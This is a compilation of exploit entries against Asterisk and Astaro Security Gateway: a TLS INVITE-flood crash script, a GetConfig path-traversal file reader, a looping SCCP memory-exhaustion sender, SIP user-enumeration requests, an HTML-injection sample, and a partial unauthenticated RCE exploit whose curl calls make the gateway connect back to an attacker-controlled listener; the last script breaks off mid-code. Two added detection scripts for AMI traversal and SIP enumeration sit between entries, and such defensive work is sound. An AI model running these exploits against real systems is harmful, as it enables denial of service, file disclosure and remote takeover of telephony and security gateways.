# Crash occurs when sending a repeated number of INVITE messages over TCP or TLS transport

- Authors:
    - Alfred Farrugia <alfred@enablesecurity.com>
    - Sandro Gauci <sandro@enablesecurity.com>
- Latest vulnerable version: Asterisk 15.2.0 running `chan_pjsip` installed with `--with-pjproject-bundled`
- References: AST-2018-005, CVE-2018-7286
- Enable Security Advisory: <https://github.com/EnableSecurity/advisories/tree/master/ES2018-04-asterisk-pjsip-tcp-segfault>
- Vendor Advisory: <http://downloads.asterisk.org/pub/security/AST-2018-005.html>
- Tested vulnerable versions: 15.2.0, 15.1.0, 15.0.0, 13.19.0, 13.11.2, 14.7.5
- Timeline:
    - Issue reported to vendor: 2018-01-24
    - Vendor patch made available to us: 2018-02-05
    - Vendor advisory published: 2018-02-21
    - Enable Security advisory: 2018-02-22

## Description

A crash occurs when a number of INVITE messages are sent over TCP or TLS and
then the connection is suddenly closed. This issue leads to a segmentation fault. 

## Impact

Abuse of this vulnerability leads to denial of service in Asterisk when
`chan_pjsip` is in use.

## How to reproduce the issue

The following script was used to reproduce the issue on a TLS connection:

```python
import md5
import re
import socket
import ssl
import uuid
from time import sleep

SERVER_IP = "127.0.0.1"
SERVER_PORT = 5061
USERNAME = "3000"
PASSWORD = "3000"
INVITE_USERNAME = "3000"

errno = 0
lasterrno = 0
while True:
    try:
        sock = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
        sock = ssl.wrap_socket(sock,
                               ssl_version=ssl.PROTOCOL_TLSv1,
                               )

        sock.connect((SERVER_IP, SERVER_PORT))
        sock.settimeout(0.5)
        errno = 0
        callid = str(uuid.uuid4())
        for ix in range(10):
            sdpbody = ""

            msg = "INVITE sip:%s@%s:%i SIP/2.0\r\n" \
                "To: <sip:%s@%s:%i>\r\n" \
                "From: Test <sip:%s@%s:%s>\r\n" \
                "Call-ID: %s\r\n" \
                "CSeq: 2 INVITE\r\n" \
                "Via: SIP/2.0/TLS 172.17.0.1:10394;branch=z9hG4bK%s\r\n" \
                "Contact: <sip:%s@172.17.0.1>\r\n" \
                "Content-Type: application/sdp\r\n" \
                "{{AUTH}}" \
                "Content-Length: %i\r\n" \
                "\r\n" % (
                    INVITE_USERNAME, SERVER_IP, SERVER_PORT,
                    INVITE_USERNAME, SERVER_IP, SERVER_PORT,
                    USERNAME, SERVER_IP, SERVER_PORT,
                    callid, callid,
                    USERNAME, len(sdpbody)
                ) + \
                sdpbody

            sock.sendall(msg.replace("{{AUTH}}", ""))

            data = sock.recv(10240)
            # print(data)
            if data.startswith("SIP/2.0 401"):
                for line in data.split('\r\n'):
                    if line.startswith("WWW-Authenticate"):
                        content = line.split(':', 2)[1].strip()
                        realm = re.search(
                            "realm=\"([a-z]+)\"", content).group(1)
                        nonce = re.search(
                            "nonce=\"([a-z0-9\/]+)\"", content).group(1)
                        ha1 = md5.new(USERNAME + ":" + realm +
                                      ":" + PASSWORD).hexdigest()
                        uri = "sip:%s:%i" % (SERVER_IP, SERVER_PORT)
                        ha2 = md5.new("INVITE:" + uri).hexdigest()
                        r = md5.new(ha1 + ":" + nonce + ":" + ha2).hexdigest()

                        auth = "Authorization: Digest username=\"%s\"," % (USERNAME) + \
                            "realm=\"%s\"," % (realm) + \
                            "nonce=\"%s\"," % (nonce) + \
                            "uri=\"%s\"," % (uri) + \
                            "response=\"%s\"," % (r) + \
                            "algorithm=md5\r\n"
                        print(auth)

            sock.sendall(msg.replace("{{AUTH}}", auth))
            errno = 0
    except (socket.error, ssl.SSLEOFError), err:
        print(err)
        print("getting close!")
        sleep(2)
        errno += 1
    if errno >= 10:
        print("confirmed dead")
        break
    elif errno > lasterrno:
        lasterrno = errno
        continue
```

The output from the tool should show the following:

```
> python test.py
Authorization: Digest username="3000",realm="asterisk",nonce="1516728889/07e2e34fbd45ed7f6b1bca0d2bde50ae",uri="sip:127.0.0.1:5061",response="a2b7e2bfa722730b64787664db474f2a",algorithm=md5

EOF occurred in violation of protocol (_ssl.c:590)
getting close!
[Errno 111] Connection refused
getting close!
[Errno 111] Connection refused
getting close!
[Errno 111] Connection refused
getting close!
[Errno 111] Connection refused
getting close!
[Errno 111] Connection refused
getting close!
[Errno 111] Connection refused
getting close!
[Errno 111] Connection refused
getting close!
[Errno 111] Connection refused
getting close!
[Errno 111] Connection refused
getting close!
confirmed dead
```

Notes:

- authentication may be required
- the destination SIP address should match a valid extension in the dialplan
- similar code to the above can be used to reproduce the issue on TCP transport


### GDB backtrace result

```
gdb --args /opt/asterisk/sbin/asterisk -fcvvv

Thread 25 "asterisk" received signal SIGSEGV, Segmentation fault.
[Switching to Thread 0x7ffff030a700 (LWP 133)]
ast_sip_failover_request (tdata=0x0) at res_pjsip.c:3956
3956            if (!tdata->dest_info.addr.count || (tdata->dest_info.cur_addr == tdata->dest_info.addr.count - 1)) {
(gdb) bt
#0  ast_sip_failover_request (tdata=0x0) at res_pjsip.c:3956
#1  0x00007ffff1a8dbb1 in check_request_status (inv=inv@entry=0x7fff9910bac8, e=0x7ffff0308ae0) at res_pjsip_session.c:3371
#2  0x00007ffff1a8dc83 in session_inv_on_state_changed (inv=0x7fff9910bac8, e=0x7ffff0308ae0) at res_pjsip_session.c:3455
#3  0x00007ffff7848217 in inv_set_state (state=PJSIP_INV_STATE_DISCONNECTED, e=0x7ffff0308ae0, inv=0x7fff9910bac8) at ../src/pjsip-ua/sip_inv.c:317
#4  inv_on_state_null (inv=0x7fff9910bac8, e=0x7ffff0308ae0) at ../src/pjsip-ua/sip_inv.c:3890
#5  0x00007ffff7841a77 in mod_inv_on_tsx_state (tsx=0x7fff99116408, e=0x7ffff0308ae0) at ../src/pjsip-ua/sip_inv.c:717
#6  0x00007ffff788299d in pjsip_dlg_on_tsx_state (dlg=0x7fff990eccc8, tsx=0x7fff99116408, e=0x7ffff0308ae0) at ../src/pjsip/sip_dialog.c:2066
#7  0x00007ffff787b513 in tsx_set_state (tsx=0x7fff99116408, state=PJSIP_TSX_STATE_TERMINATED, event_src_type=PJSIP_EVENT_TRANSPORT_ERROR, event_src=0x7fff9910fda8, flag=0)
    at ../src/pjsip/sip_transaction.c:1267
#8  0x00007ffff787cfec in send_msg_callback (send_state=0x7fff9918d2f0, sent=-171064, cont=0x7ffff0308c04) at ../src/pjsip/sip_transaction.c:1970
#9  0x00007ffff78661ae in send_response_resolver_cb (status=<optimized out>, token=0x7fff9918d2f0, addr=0x7ffff0308c60) at ../src/pjsip/sip_util.c:1721
#10 0x00007ffff184df8c in sip_resolve (resolver=<optimized out>, pool=<optimized out>, target=0x7fff99116530, token=0x7fff9918d2f0, cb=0x7ffff78660f0 <send_response_resolver_cb>)
    at res_pjsip/pjsip_resolver.c:527
#11 0x00007ffff7869adb in pjsip_resolve (resolver=0x1b64d40, pool=<optimized out>, target=target@entry=0x7fff99116530, token=token@entry=0x7fff9918d2f0,
    cb=cb@entry=0x7ffff78660f0 <send_response_resolver_cb>) at ../src/pjsip/sip_resolve.c:209
#12 0x00007ffff78652b9 in pjsip_endpt_resolve (endpt=endpt@entry=0x1638d28, pool=<optimized out>, target=target@entry=0x7fff99116530, token=token@entry=0x7fff9918d2f0,
    cb=cb@entry=0x7ffff78660f0 <send_response_resolver_cb>) at ../src/pjsip/sip_endpoint.c:1164
#13 0x00007ffff7867fe1 in pjsip_endpt_send_response (endpt=0x1638d28, res_addr=res_addr@entry=0x7fff99116508, tdata=tdata@entry=0x7fff9910fda8, token=token@entry=0x7fff99116408,
    cb=cb@entry=0x7ffff787cd80 <send_msg_callback>) at ../src/pjsip/sip_util.c:1796
#14 0x00007ffff787bdac in tsx_send_msg (tsx=0x7fff99116408, tdata=0x7fff9910fda8) at ../src/pjsip/sip_transaction.c:2237
#15 0x00007ffff787dc67 in tsx_on_state_proceeding_uas (event=0x7ffff0309b30, tsx=0x7fff99116408) at ../src/pjsip/sip_transaction.c:2704
#16 tsx_on_state_trying (tsx=0x7fff99116408, event=0x7ffff0309b30) at ../src/pjsip/sip_transaction.c:2634
#17 0x00007ffff787fba7 in pjsip_tsx_send_msg (tsx=tsx@entry=0x7fff99116408, tdata=tdata@entry=0x7fff9910fda8) at ../src/pjsip/sip_transaction.c:1789
#18 0x00007ffff78822a3 in pjsip_dlg_send_response (dlg=0x7fff990eccc8, tsx=0x7fff99116408, tdata=tdata@entry=0x7fff9910fda8) at ../src/pjsip/sip_dialog.c:1531
#19 0x00007ffff784519a in pjsip_inv_send_msg (inv=0x7fff9910bac8, tdata=0x7fff9910fda8) at ../src/pjsip-ua/sip_inv.c:3231
#20 0x00007ffff1a8c043 in ast_sip_session_send_response (session=session@entry=0x7fff9910e208, tdata=<optimized out>) at res_pjsip_session.c:1712
#21 0x00007ffff1a8ec09 in new_invite (invite=<synthetic pointer>) at res_pjsip_session.c:2963
#22 handle_new_invite_request (rdata=0x7fff9524ce58) at res_pjsip_session.c:3062
#23 session_on_rx_request (rdata=0x7fff9524ce58) at res_pjsip_session.c:3126
#24 0x00007ffff7864e97 in pjsip_endpt_process_rx_data (endpt=<optimized out>, rdata=rdata@entry=0x7fff9524ce58, p=p@entry=0x7ffff1a7ed00 <param>,
    p_handled=p_handled@entry=0x7ffff0309d44) at ../src/pjsip/sip_endpoint.c:893
#25 0x00007ffff185427f in distribute (data=0x7fff9524ce58) at res_pjsip/pjsip_distributor.c:903
#26 0x00000000005fc6fe in ast_taskprocessor_execute (tps=tps@entry=0x1cf2b08) at taskprocessor.c:963
#27 0x0000000000603960 in execute_tasks (data=0x1cf2b08) at threadpool.c:1322
#28 0x00000000005fc6fe in ast_taskprocessor_execute (tps=0x16343d8) at taskprocessor.c:963
#29 0x0000000000603e40 in threadpool_execute (pool=0x1637b78) at threadpool.c:351
#30 worker_active (worker=0x7fffa0000948) at threadpool.c:1105
#31 worker_start (arg=arg@entry=0x7fffa0000948) at threadpool.c:1024
#32 0x000000000060eddd in dummy_start (data=<optimized out>) at utils.c:1257
#33 0x00007ffff5e366ba in start_thread (arg=0x7ffff030a700) at pthread_create.c:333
#34 0x00007ffff541f3dd in clone () at ../sysdeps/unix/sysv/linux/x86_64/clone.S:109
(gdb)
```

## Solutions and recommendations

Apply the patch issued by Asterisk at <http://www.asterisk.org/security> or upgrade to the latest release.

## About Enable Security

[Enable Security](https://www.enablesecurity.com) provides Information Security services, including Penetration Testing, Research and Development, to help protect client networks and applications against online attackers.

## Disclaimer

The information in the advisory is believed to be accurate at the time of publishing based on currently available information. Use of the information constitutes acceptance for use in an AS IS condition. There are no warranties with regard to this information. Neither the author nor the publisher accepts any liability for any direct, indirect, or consequential loss or damage arising from use of, or reliance on, this information.
            
# Exploit Title: Asterisk AMI - Partial File Content & Path Disclosure (Authenticated)
# Date: 2023-03-26
# Exploit Author: Sean Pesce
# Vendor Homepage: https://asterisk.org/
# Software Link: https://downloads.asterisk.org/pub/telephony/asterisk/old-releases/
# Version: 18.20.0
# Tested on: Debian Linux
# CVE: CVE-2023-49294

#!/usr/bin/env python3
#
# Proof of concept exploit for CVE-2023-49294, an authenticated vulnerability in Asterisk AMI that
# facilitates filesystem enumeration (discovery of existing file paths) and limited disclosure of
# file contents. Disclosed files must adhere to the Asterisk configuration format, which is similar
# to the common INI configuration format.
#
# References:
#   https://nvd.nist.gov/vuln/detail/CVE-2023-49294
#   https://github.com/asterisk/asterisk/security/advisories/GHSA-8857-hfmw-vg8f
#   https://docs.asterisk.org/Asterisk_18_Documentation/API_Documentation/AMI_Actions/GetConfig/


import argparse
import getpass
import socket
import sys


CVE_ID = 'CVE-2023-49294'

DEFAULT_PORT = 5038
DEFAULT_FILE = '/etc/hosts'
DEFAULT_ACTION_ID = 0
DEFAULT_TCP_READ_SZ = 1048576  # 1MB



def ami_msg(action, args, encoding='utf8'):
    assert type(action) == str, f'Invalid type for AMI Action (expected string): {type(action)}'
    assert type(args) == dict, f'Invalid type for AMI arguments (expected dict): {type(args)}'
    if 'ActionID' not in args:
        args['ActionID'] = 0
    line_sep = '\r\n'
    data = f'Action: {action}{line_sep}'
    for a in args:
        data += f'{a}: {args[a]}{line_sep}'
    data += line_sep
    return data.encode(encoding)



def tcp_send_rcv(sock, data, read_sz=DEFAULT_TCP_READ_SZ):
    assert type(data) in (bytes, bytearray, memoryview), f'Invalid data type (expected bytes): {type(data)}'
    sock.sendall(data)
    resp = b''
    while not resp.endswith(b'\r\n\r\n'):
        resp += sock.recv(read_sz)
    return resp



if __name__ == '__main__':
    # Parse command-line arguments
    argparser = argparse.ArgumentParser()
    argparser.add_argument('host', type=str, help='The host name or IP address of the Asterisk AMI server')
    argparser.add_argument('-p', '--port', type=int, help=f'Asterisk AMI TCP port (default: {DEFAULT_PORT})', default=DEFAULT_PORT)
    argparser.add_argument('-u', '--user', type=str, help=f'Asterisk AMI user', required=True)
    argparser.add_argument('-P', '--password', type=str, help=f'Asterisk AMI secret', default=None)
    argparser.add_argument('-f', '--file', type=str, help=f'File to read (default: {DEFAULT_FILE})', default=DEFAULT_FILE)
    argparser.add_argument('-a', '--action-id', type=int, help=f'Action ID (default: {DEFAULT_ACTION_ID})', default=DEFAULT_ACTION_ID)
    if '-h' in sys.argv or '--help' in sys.argv:
        print(f'Proof of concept exploit for {CVE_ID} in Asterisk AMI. More information here: \nhttps://nvd.nist.gov/vuln/detail/{CVE_ID}\n', file=sys.stderr)
        argparser.print_help()
        sys.exit(0)
    args = argparser.parse_args()

    # Validate command-line arguments
    assert 1 <= args.port <= 65535, f'Invalid port number: {args.port}'
    args.host = socket.gethostbyname(args.host)
    if args.password is None:
        args.password = getpass.getpass(f'[PROMPT] Enter the AMI password for {args.user}: ')

    print(f'[INFO] Proof of concept exploit for {CVE_ID}', file=sys.stderr)
    print(f'[INFO] Connecting to Asterisk AMI:  {args.user}@{args.host}:{args.port}', file=sys.stderr)

    # Connect to the Asterisk AMI server
    sock = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
    sock.setsockopt(socket.SOL_SOCKET, socket.SO_REUSEADDR, 1)
    sock.connect((args.host, args.port))

    # Read server banner
    banner = sock.recv(DEFAULT_TCP_READ_SZ)
    print(f'[INFO] Connected to {banner.decode("utf8").strip()}', file=sys.stderr)

    # Authenticate to the Asterisk AMI server
    login_msg = ami_msg('Login', {'Username':args.user,'Secret':args.password})
    login_resp = tcp_send_rcv(sock, login_msg)
    while b'Authentication' not in login_resp:
        login_resp = tcp_send_rcv(sock, b'')
    if b'Authentication accepted' not in login_resp:
        print(f'\n[ERROR] Invalid credentials: \n{login_resp.decode("utf8")}', file=sys.stderr)
        sys.exit(1)
    #print(f'[INFO] Authenticated: {login_resp.decode("utf8")}', file=sys.stderr)
    print(f'[INFO] Login success', file=sys.stderr)

    # Obtain file data via path traversal
    traversal = '../../../../../../../../'
    cfg_msg = ami_msg('GetConfig', {
        'ActionID': args.action_id,
        'Filename': f'{traversal}{args.file}',
        #'Category': 'default',
        #'Filter': 'name_regex=value_regex,',
    })
    resp = tcp_send_rcv(sock, cfg_msg)
    while b'Response' not in resp:
        resp = tcp_send_rcv(sock, b'')

    print(f'', file=sys.stderr)
    print(f'{resp.decode("utf8")}')

    if b'Error' in resp:
        sys.exit(1)

    pass  # Done
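A defender-side counterpart to the GetConfig request above, added here and not part of the original exploit: it parses the AMI "Key: Value" framing the PoC speaks and flags configuration actions whose file parameter would escape the configuration directory, which is the check you would run over a capture of AMI traffic or inside an AMI proxy. GetConfigJSON and UpdateConfig (SrcFilename/DstFilename) are assumed to take the same kind of relative path as GetConfig; the sample session is constructed.

```python
"""Flag path-traversal attempts in Asterisk AMI configuration actions.

Added example (not part of the exploit above). It parses the AMI
"Key: Value" framing used by the PoC and reports GetConfig-style
actions whose file parameter would leave the configuration directory.
"""
import posixpath

# Actions that take a file name relative to the Asterisk config directory.
# GetConfig is the one exploited above; GetConfigJSON and UpdateConfig are
# assumed here to take the same kind of parameter.
CONFIG_ACTIONS = {
    'getconfig': ('filename',),
    'getconfigjson': ('filename',),
    'updateconfig': ('srcfilename', 'dstfilename'),
}

# Constructed sample of an AMI client session (not a real capture).
SAMPLE_STREAM = (
    b'Action: Login\r\nUsername: admin\r\nSecret: s3cret\r\nActionID: 1\r\n\r\n'
    b'Action: GetConfig\r\nActionID: 2\r\nFilename: sip.conf\r\n\r\n'
    b'Action: GetConfig\r\nActionID: 3\r\n'
    b'Filename: ../../../../../../../../etc/hosts\r\n\r\n'
    b'Action: GetConfig\r\nActionID: 4\r\nFilename: /etc/passwd\r\n\r\n'
    b'Action: GetConfig\r\nActionID: 5\r\nFilename: subdir/../pjsip.conf\r\n\r\n'
    b'Action: UpdateConfig\r\nActionID: 6\r\nSrcFilename: extensions.conf\r\n'
    b'DstFilename: ../../../../tmp/evil.conf\r\n\r\n'
)


def parse_ami_stream(data):
    """Split raw AMI bytes into one dict per message (keys lower-cased).

    Messages are blocks of "Key: Value" lines ended by an empty line.
    """
    messages = []
    for block in data.decode('utf8', errors='replace').split('\r\n\r\n'):
        if not block.strip():
            continue
        msg = {}
        for line in block.split('\r\n'):
            key, sep, value = line.partition(':')
            if sep:
                msg[key.strip().lower()] = value.strip()
        messages.append(msg)
    return messages


def escapes_config_dir(filename):
    """True if `filename` resolves outside the directory it is relative to."""
    if not filename:
        return False
    if filename.startswith(('/', '\\')):
        return True  # absolute path
    # "subdir/../pjsip.conf" normalises to "pjsip.conf" and is fine;
    # anything still starting with ".." climbs out of the directory.
    normalized = posixpath.normpath(filename.replace('\\', '/'))
    return normalized == '..' or normalized.startswith('../')


def find_traversal_attempts(data):
    """Return (ActionID, parameter, value) for each suspicious config action."""
    hits = []
    for msg in parse_ami_stream(data):
        params = CONFIG_ACTIONS.get(msg.get('action', '').lower())
        if not params:
            continue
        for param in params:
            value = msg.get(param)
            if value is not None and escapes_config_dir(value):
                hits.append((msg.get('actionid', ''), param, value))
    return hits


if __name__ == '__main__':
    for action_id, param, value in find_traversal_attempts(SAMPLE_STREAM):
        print(f'ActionID {action_id}: {param} = {value!r}')
```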
            
# Exploit Author: Juan Sacco <jsacco@exploitpack.com> - http://exploitpack.com
# Vulnerability found using Exploit Pack v10 - Fuzzer module
# CVE-2017-17090 -  AST-2017-013
#
# Tested on: Asterisk 13.17.2~dfsg-2
#
# Description: Asterisk is prone to a remote unauthenticated memory exhaustion
# The vulnerability is due to an error when the vulnerable application
# handles crafted SCCP packet. A remote attacker may be able to exploit
# this to cause a denial of service condition on the affected system.
#
# [Nov 29 15:38:06] ERROR[7763] tcptls.c: TCP/TLS unable to launch
# helper thread: Cannot allocate memory
#
# Program: Asterisk is an Open Source PBX and telephony toolkit.  It is, in a
# sense, middleware between Internet and telephony channels on the bottom,
# and Internet and telephony applications at the top.
#
# Homepage: http://www.asterisk.org/
# Filename: pool/main/a/asterisk/asterisk_13.17.2~dfsg-2_i386.deb
#
# Example usage: python asteriskSCCP.py 192.168.1.1 2000

import binascii
import sys
import socket
import time

def asteriskSCCP(target,port):
    try:
        while 1:
            # Open socket
            s = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
            # Set reuse ON
            s.setsockopt(socket.SOL_SOCKET, socket.SO_REUSEADDR, 1)
            # Connect to the target
            s.connect((target, port))
            print("[" + time.strftime('%a %H:%M:%S') + "]" + " - " + "Connected to:"), target, port
            print("[" + time.strftime('%a %H:%M:%S') + "]" + " - " + "Establishing connection.. ")
            packet = \
binascii.unhexlify(b'450002c50001000040067a307f0000017f000001001407d00000000000000000500220009a2b0000e4eea8a72a97467d3631824ac1c08c604e762eb80af46cc6d219a4cf65c13992b4a8af94cb5e87c14faf0254cba25af9fb33bd8d2a58e370e3a866639dfdec350875cfecfe068a16746963fffeee0fdcbac75eb4f09d625f3ae1b4a3eb2812e6f838e88b0d7d9881465a0faf45664df8008d4d6de1a5e20a9c97a71f57d3429e0b17db3aeb3bf516ca4e207a5c801d04132979508f267c7425a57fd0edd271b57ff9831b595b519e73404f170492ae3ad438d4aeca854e96c9dd56d2af3813b8de6b3d8d31d32c0e95be9cb3a5c6106f64c4f19cda2b55ad1471f3d63e1b1ca3c29f362def063ad9b29ea4d1c1fda5c2e4cf0ae75064c27411a2deb5fab11e6412cd5a4037f38779f0173fa1f2ca1740aa78fe37bc0a50f5619c7abba00f2957bf06770ff4d6c003d4533de19f51bcbbd9bbe0ceb3e17dd180e58ee2698998edca42e3d6a8079cc151b608e5bd5aff052e718e714b360f9b091894a5eeed34dafe41d27f19988b3e0ac5a6dd8947c3537ae31154e983cdbac0861afc500206e74030c9e452738ece13075df2dbebb8a1737ee3b4880bc6d428ee2d3d64f585e197dc63f30638a4c55cff0b8e6aa82dfdf199baabd92c10092414015fad5f08e9c816a4d028574ee5340c08b2fe65ca1e7ca907ea2ebd6661e01e9b9d39d5bdb3e3cebd58e96f97f487bb580bcf5447ac48a2ad5541ae0ddcc9ec1f9528f2c07316dbd760e91e3bddbd53fbf6987fdba0830bdb485524950b5611e18e5d517c0f3ae05aa2daec42a5c43eab07aa0018ab750dc6995adad6561cc8a0379f7a12d8e5e474df013459442801d6871c5820318d790833687619b70b0da74893ca441f177ab9e7d7a537c6ff4920c79631905c35167d8a6efc0c6bced9270691abc5b4de84f956f8c1d34f9ef3f0073dafce8c076c4d537e981a1e8ff6ed3e8c')

            # Log the packet in hexa and timestamp
            fileLog = target + ".log"
            logPacket = open(fileLog, "w+")
            logPacket.write("["+time.strftime('%a %H:%M:%S')+"]"+ " - Packet sent: " + binascii.hexlify(bytes(packet))+"\n")
            logPacket.close()

            # Write bytecodes to socket
            print("["+time.strftime('%a %H:%M:%S')+"]"+" - "+"Packet sent: ")
            s.send(bytes(packet))
            # Packet sent:
            print(bytes(packet))
            try:
                data = s.recv(4096)
                print("[" + time.strftime('%a %H:%M:%S') + "]" + " - "+ "Data received: '{msg}'".format(msg=data))
            except socket.error, e:
                print 'Sorry, No data available'
                continue
        s.close()
    except socket.error as error:
        print error
        print "Sorry, something went wrong!"

def howtouse():
    print "Usage: AsteriskSCCP.py Hostname Port"
    print "[*] Mandatory arguments:"
    print "[-] Specify a hostname / port"
    sys.exit(-1)

if __name__ == "__main__":
    try:
        # Set target
        target = sys.argv[1]
        port = int(sys.argv[2])

        print "[*] Asterisk 13.17 Exploit by Juan Sacco <jsacco@exploitpack.com "
        asteriskSCCP(target, port)
    except IndexError:
        howtouse()
            
source: https://www.securityfocus.com/bid/47676/info

Asterisk is prone to a user-enumeration weakness.

An attacker may leverage this issue to harvest valid usernames, which may aid in brute-force attacks.

This issue affects Asterisk 1.8.

The following request demonstrates the issue:

INVITE sip:192.168.2.1 SIP/2.0
CSeq: 3 INVITE
Via: SIP/2.0/UDP www.example.com:5060;branch=z9hG4bK78adb2cd-0671-e011-81a1-a1816009ca7a;rport
User-Agent: TT
From: <sip:105@192.168.2.1>;tag=642d29cd-0671-e011-81a1-a1816009ca7a
Call-ID: 5RRdd5Cv-0771-e011-84a1-a1816009ca7a@lapblack2
To: <sip:500@192.168.2.1>
Contact: <sip:105@localhost>;q=1
Allow: INVITE,ACK,OPTIONS,BYE,CANCEL,SUBSCRIBE,NOTIFY,REFER,MESSAGE,INFO,PING
Expires: 3600
Content-Length: 0
Max-Forwards: 70 
            
source: https://www.securityfocus.com/bid/48008/info

Asterisk is prone to a user-enumeration weakness.

An attacker may leverage this issue to harvest valid usernames, which may aid in brute-force attacks.

This issue affects Asterisk 1.8.4.1; other versions may also be affected. 


REGISTER sip:192.168.2.1 SIP/2.0
CSeq: 123 REGISTER
Via: SIP/2.0/UDP localhost:5060;branch=z9hG4bK78adb2cd-0671-e011-81a1-a1816009ca7a;rport
User-Agent: TT
From: <sip:500@192.168.2.1>;tag=642d29cd-0671-e011-81a1-a1816009ca7a
Call-ID: 2e2f07e0499cec3abf7045ef3610f0f2
To: <sip:500@192.168.2.1>
Refer-To: sip:500@192.168.2.1
Contact: <sip:500@localhost>;q=1
Allow: INVITE,ACK,OPTIONS,BYE,CANCEL,SUBSCRIBE,NOTIFY,REFER,MESSAGE,INFO,PING
Expires: 3600
Content-Length: 28000
Max-Forwards: 70
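A detection-side example for the two enumeration entries above (bid/47676 and bid/48008), added here and not taken from those entries: it parses INVITE and REGISTER requests shaped like the quoted ones and flags a source that addresses many distinct To users within a short window. The hosts, timestamps and threshold are constructed sample values.

```python
"""Spot SIP user-enumeration probing from a set of observed requests.

Added example, not from the SecurityFocus entries above. A scanner sends
many INVITE or REGISTER requests that differ only in the To user; this
groups requests by source and flags sources that address many distinct
users inside a short window.
"""
import re
from collections import defaultdict

# User part of a SIP/SIPS URI, e.g. "500" in "<sip:500@192.168.2.1>".
URI_USER_RE = re.compile(r'sips?:([^@>;\s]+)@')


def parse_sip_request(raw):
    """Return (method, headers) with header names lower-cased.

    Only the request line and headers are parsed; the body, if any, is
    left alone (Content-Length is not honoured here).
    """
    lines = raw.replace('\r\n', '\n').lstrip('\n').split('\n')
    method = lines[0].split(' ', 1)[0].upper()
    headers = {}
    for line in lines[1:]:
        if not line.strip():
            break  # blank line ends the header section
        name, sep, value = line.partition(':')
        if sep:
            headers[name.strip().lower()] = value.strip()
    return method, headers


def target_user(headers):
    """User the request is addressed to, taken from the To header."""
    match = URI_USER_RE.search(headers.get('to', ''))
    return match.group(1) if match else None


def detect_enumeration(requests, threshold=5, window=60.0):
    """requests: iterable of (timestamp_seconds, source_ip, raw_request).

    Returns {source_ip: sorted list of users probed} for every source that
    addressed at least `threshold` distinct To users within `window` seconds.
    """
    probes = defaultdict(list)
    for ts, src, raw in requests:
        method, headers = parse_sip_request(raw)
        if method not in ('INVITE', 'REGISTER'):
            continue
        user = target_user(headers)
        if user:
            probes[src].append((ts, user))
    flagged = {}
    for src, events in probes.items():
        events.sort()
        for i, (start, _) in enumerate(events):
            users = {u for t, u in events[i:] if t - start <= window}
            if len(users) >= threshold:
                flagged[src] = sorted(users)
                break
    return flagged


def build_invite(user, tag, src_host='10.0.0.5'):
    """Constructed INVITE shaped like the one quoted above (sample data)."""
    return (
        'INVITE sip:192.168.2.1 SIP/2.0\r\n'
        'CSeq: 3 INVITE\r\n'
        f'Via: SIP/2.0/UDP {src_host}:5060;branch=z9hG4bK{tag};rport\r\n'
        'User-Agent: TT\r\n'
        f'From: <sip:105@192.168.2.1>;tag={tag}\r\n'
        f'Call-ID: {tag}@{src_host}\r\n'
        f'To: <sip:{user}@192.168.2.1>\r\n'
        'Content-Length: 0\r\n'
        '\r\n'
    )


# Constructed traffic: one host walks users 100..106 in seven seconds, another
# host calls the same user three times over half a minute.
SAMPLE_REQUESTS = (
    [(float(i), '10.0.0.5', build_invite(str(100 + i), f'scan{i}')) for i in range(7)]
    + [(10.0 * i, '10.0.0.9', build_invite('105', f'call{i}', '10.0.0.9')) for i in range(3)]
)


if __name__ == '__main__':
    for src, users in detect_enumeration(SAMPLE_REQUESTS).items():
        print(f'{src}: probed {len(users)} users: {", ".join(users)}')
```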
            
source: https://www.securityfocus.com/bid/51301/info

Astaro Security Gateway is prone to an HTML-injection vulnerability because it fails to properly sanitize user-supplied input before using it in dynamically generated content.

Attacker-supplied HTML and script code would run in the context of the affected website, potentially allowing the attacker to steal cookie-based authentication credentials or control how the site is rendered to the user.

Astaro Security Gateway 8.1 is vulnerable; other versions may also be affected. 

<div style="left: 300px; top: 220px; z-index: 2000; visibility: visible;" class="iPopUp" id="iPopup_2"><div class="iPopUpTitle">Please confirm:</div><div class="iPopUpText"><p>&#8203;&#8203;&#8203;&#8203;&#8203;Are you sure that you want to delete the X509 certificate with private key object '>"<INCLUDED PERSISTENT SCRIPTCODE HERE!!!">'?</p></iframe></p></div><table border="0" cellpadding="0" cellspacing="0"><tbody><tr><td style="padding: 2px;"><div id="btnDefault_iPopup_2" class="button" style="width: auto; cursor: pointer; color: black; font-weight: bold;"><div class="button_left"></div><div class="button_center" style="width: auto;"><span style="font-weight: normal;">OK</span></div><div class="button_right"></div></div></td>&#8203;&#8203;&#8203;&#8203;&#8203;<td style="padding: 2px;"><div class="button" style="width: auto; cursor: pointer; color: black;"><div class="button_left"></div><div class="button_center" style="width: auto;"><span style="font-weight: normal;">Cancel</span></div><div class="button_right"></div></div></td></tr></tbody></table></div>

        ../index.dat
            
#!/usr/bin/python

# Astaro Security Gateway v7 - Unauthenticated Remote Code Execution
# Exploit Authors: Jakub Palaczynski and Maciej Grabiec
# Tested on versions: 7.500 and 7.506
# Date: 13.12.2016
# Vendor Homepage: https://www.sophos.com/
# CVE: CVE-2017-6315

import socket
import sys
import os
import threading
import subprocess
import time

# print help or assign arguments
if len(sys.argv) != 3:
    sys.stderr.write("[-]Usage: python %s <our_ip> <remote_ip:port>\n" % sys.argv[0])
    sys.stderr.write("[-]Example: python %s 192.168.1.1 192.168.1.2:4444\n" % sys.argv[0])
    sys.exit(1)

lhost = sys.argv[1] # our ip address
rhost = sys.argv[2] # ip address and port of vulnerable ASG v7

# for additional thread to send requests in parallel
class requests (threading.Thread):
    def run(self):
        print 'Sending requests to trigger vulnerability.'
        time.sleep(5)
        # first request to clear cache
        os.system('curl -s -m 5 -X POST https://' + rhost + '/index.plx -d \'{"objs": [{"FID": "init"}],"backend_address": "' + lhost + ':81"}\' -k > /dev/null')
        # second request to trigger reverse connection
        os.system('curl -s -m 20 -X POST https://' + rhost + '/index.plx -d \'{"objs": [{"FID": "init"}],"backend_address": "' + lhost + ':80"}\' -k > /dev/null')

# function that creates socket
def create_socket(port):
    sock = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
    sock.setsockopt(socket.SOL_SOCKET, socket.SO_REUSEADDR, 1)
    sock.bind(('0.0.0.0', port))
    sock.listen(10)
    conn, addr = sock.accept()
    return sock, conn, addr

# function to receive data from socket
def receive(conn):
    sys.stdout.write(conn.recv(1024))
    sys.stdout.flush()
    sys.stdout.write(conn.recv(1024))
    sys.stdout.flush()

